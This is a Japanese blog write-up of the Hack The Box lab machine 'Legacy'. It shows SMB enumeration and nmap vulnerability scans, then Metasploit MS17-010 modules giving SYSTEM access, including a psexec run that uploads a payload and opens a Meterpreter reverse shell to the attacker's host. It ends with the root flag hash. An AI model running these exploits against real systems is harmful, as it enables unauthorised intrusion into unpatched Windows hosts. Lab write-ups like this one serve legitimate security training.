Hack The Box 攻略してみた(Writeup)Legacy
nmapでサービス列挙
# Nmap 7.93 scan initiated Sat Dec 2 08:37:37 2023 as: nmap -sCV -p- --stats-every 5s --min-rate 300 -oA nmap.log 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.35s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
6196/tcp filtered unknown
14630/tcp filtered unknown
24051/tcp filtered unknown
24223/tcp filtered unknown
28216/tcp filtered unknown
33159/tcp filtered unknown
38698/tcp filtered unknown
41645/tcp filtered unknown
42717/tcp filtered unknown
60326/tcp filtered unknown
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m49s, median: 4d23h57m40s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9ec51 (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2023-12-07T03:39:14+02:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 2 08:41:48 2023 -- 1 IP address (1 host up) scanned in 251.63 seconds
smbが開いてますね。enum4linux、smbmapが使えそうです。
enum4linuxを認証情報なし(null)で実行し、ユーザIDや共有フォルダの情報が取れるか確認
cat enum4linux-null.log
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 2 09:02:23 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================( Enumerating Workgroup/Domain on 10.10.10.4 )=============================
[+] Got domain/workgroup name: HTB
=================================( Nbtstat Information for 10.10.10.4 )=================================
Looking up status of 10.10.10.4
LEGACY <00> - B <ACTIVE> Workstation Service
HTB <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
LEGACY <20> - B <ACTIVE> File Server Service
HTB <1e> - <GROUP> B <ACTIVE> Browser Service Elections
HTB <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MAC Address = 00-50-56-B9-EC-51
====================================( Session Check on 10.10.10.4 )====================================
[+] Server 10.10.10.4 allows sessions using username '', password ''
=================================( Getting domain SID for 10.10.10.4 )=================================
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup
====================================( OS information on 10.10.10.4 )====================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.10.4 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
========================================( Users on 10.10.10.4 )========================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==================================( Share Enumeration on 10.10.10.4 )==================================
[E] Can't list shares: NT_STATUS_ACCESS_DENIED
[+] Attempting to map shares on 10.10.10.4
=============================( Password Policy Information for 10.10.10.4 )=============================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.10.4 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.4)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[E] Failed to get password policy with rpcclient
========================================( Groups on 10.10.10.4 )========================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================( Users on 10.10.10.4 via RID cycling (RIDS: 500-550,1000-1050) )===================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
================================( Getting printer info for 10.10.10.4 )================================
No printers returned.
enum4linux complete on Sat Dec 2 09:03:24 2023
とくに有益な情報は取れませんね。smbmapでも確認しておきましょう。
smbmapで共有フォルダにアクセスできるか確認
$ smbmap -H 10.10.10.4 -u guest -p "" -d workgroup
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
アクセス権限なしですね。nmapの脆弱性スキャンで内在している脆弱性を列挙します。
nmap脆弱性スキャン
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:15 JST
Nmap scan report for 10.10.10.4
Host is up (0.74s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250ew
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
Nmap done: 1 IP address (1 host up) scanned in 112.22 seconds
smb-vuln-ms08-067とms17-010がヒットしました。smb-vuln-ms08-067、ms17-010について調べてみます。
どうやらどちらの脆弱性もリモートコード実行ができるっぽいですね。今回はETERNALBLUEとも呼ばれているMS17-010の脆弱性を利用して侵入してみます。
とりあえずmetasploitのcheck機能を使って脆弱性があるかどうかの再確認をします。
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.10.10.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.4:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms17_010_eternalblue) > hit!!!!!!!脆弱性ありですね!それではこのままmetasploitを実行してshellを取ります。
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.16.17:5555
[*] 10.10.10.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.4:445 - The target is vulnerable.
[-] 10.10.10.4:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.失敗してますね。どうやらこのexploitはwindows 64-bitにしか対応していないようです。(上記ログからも対象が32-bitであることを確認できます。32bit版のexploit等探しましたが見つけられなかったため別の脆弱性を利用して侵入することにしましょう。(ちゃんと探したら見つかりそうですが。。。)
msf6 auxiliary(admin/smb/ms17_010_command) > run
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x861c4448
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.10.10.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.10.4:445 - Getting the command output...
[*] 10.10.10.4:445 - Executing cleanup...
[+] 10.10.10.4:445 - Cleanup was successful
[+] 10.10.10.4:445 - Command completed successfully!
[*] 10.10.10.4:445 - Output for "net group "Domain Admins" /domain":
The request will be processed at a domain controller for domain HTB.
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedこっちのmetasploitならうまくいきました!!どうやら認証なしでOSコマンドを実行できているようです。コマンドとしては”net group “Domain Admins” /domain”であり、結果として”HTB”が得られました。正直この情報はどうでもいいのでコマンドの内容をリバースシェルを取得するためのコマンドに変更して実施する必要がありそうですね。いろいろごちゃごちゃやりましたがうまくコマンドが実行できなかったので他のmetasploitを試したらうまくshellが取れました↓
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.16.17:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x86263da8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... jkQoqypC.exe
[*] 10.10.10.4:445 - Created \jkQoqypC.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \jkQoqypC.exe...
[*] Meterpreter session 2 opened (10.10.16.17:4444 -> 10.10.10.4:1033) at 2023-12-07 00:21:12 +0900
meterpreter > pwd
C:\WINDOWS\system32
システム権限で侵入成功です!上記の方法ならmetasploit一発で侵入できますが、自分のペネトレーションスキルをあげるためにもコードを編集できる力はつけたいですね。
↓flagはここにありました!
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > cat root.txt
993442d258b0e0ec917cae9e695d5713
meterpreter >
コメント